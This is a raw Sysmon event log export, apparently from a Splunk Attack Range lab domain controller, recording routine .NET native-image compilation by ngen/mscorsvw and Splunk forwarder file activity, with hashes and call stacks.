Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000019706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:45.488{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11d4-0\System.Management.dll2021-06-23 21:02:45.488 23542300x800000000000000019705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.426{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FECEC84CA9127174363B578CF8946285,SHA256=96BC3A83EE369F10B8936E04E2B5CEDFC92BD83A0179B34D71DDC16C2291B0E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEC30854D180C3CF33778F0901C86A3,SHA256=CF7AAD6A5BF97D534BC0B36E83B1609C35BC79A787FB0693EFD050A1F7F9DD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.816{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79C621ECC0DB1EB3B579524B6C14450B,SHA256=D4612FD87A9EAB1F8A663293AD2D98674C16C149F2C6F74F8F7DF13ABA928141,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:46.207{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.191{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:46.191{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAE0C04E1B858D7A97B2BE079834E262,SHA256=66F0630439D4E10C69FFD62EF68353C9274A40D2BD68B8590990C9B4B808DC59,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.941{4DB9351A-A177-60D3-0603-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RMMJJSBVRE\System.DirectoryServices.ni.dll.auxMD5=31286E44B261B65582EC519B9203D318,SHA256=8B91498B66C0F3715D475DECC77B6DF189F14806F5E814B6C954B94CB7891F19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.941{4DB9351A-A177-60D3-0603-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RMMJJSBVRE\System.DirectoryServices.ni.dllMD5=9200CABF15C545EAE0645372960FF7A7,SHA256=9A23D5A7D6A5803334B7E91A639E46D8E9DB85AA03559DCB2C7FEB3870699B6B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:47.879{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd8-0\System.DirectoryServices.dll2021-06-23 21:02:47.879 10341000x800000000000000019736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.363{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.332{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.332{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.285{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.269{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.269{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.207{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.192{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:47.192{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.098{4DB9351A-A176-60D3-0303-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U8SLS5HAUR\Microsoft.VisualBasic.ni.dll.auxMD5=014370C2C340177B4F4B45C6DD281F3E,SHA256=BAD9FC63EA5C80D85009FBA7DDF699175A00466B7AEF1E802281635A6784E2CE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.098{4DB9351A-A176-60D3-0303-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U8SLS5HAUR\Microsoft.VisualBasic.ni.dllMD5=F7EB3BD0DF441921AE17140ACFFDD52A,SHA256=2F1B8DFDFA6E5FC41D66F88B9437FF0473BC713278E207DE63D485024731881D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:47.051{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18a0-0\Microsoft.VisualBasic.dll2021-06-23 21:02:47.051 10341000x800000000000000019756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.707{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.707{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
23542300x800000000000000019753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.644{4DB9351A-A178-60D3-0803-00000000CF01}4784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PDSPYAGW31\System.Transactions.ni.dll.auxMD5=41647B6347DDA57E3341211880499114,SHA256=B75F63545EA42F8D312E5603146C43F773C9BD6526786795412BA4030E6C5090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.644{4DB9351A-A178-60D3-0803-00000000CF01}4784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PDSPYAGW31\System.Transactions.ni.dllMD5=3E29FF5CA4A3450636E1196494C42CD5,SHA256=B557336FB30E51EFEFA7FDC886D84A32F0292F83030A52CC7913B8FEDFDC4428,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:48.613{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b0-0\System.Transactions.dll2021-06-23 21:02:48.613 23542300x800000000000000019750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.254{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68CA6FF180E3F19ED34F048146807DA3,SHA256=A645502F99D5B1DF5962180CB303E95FDCDEB99FD5A84498DFD293B9FCAB97E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:48.144{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61efc|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000019748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
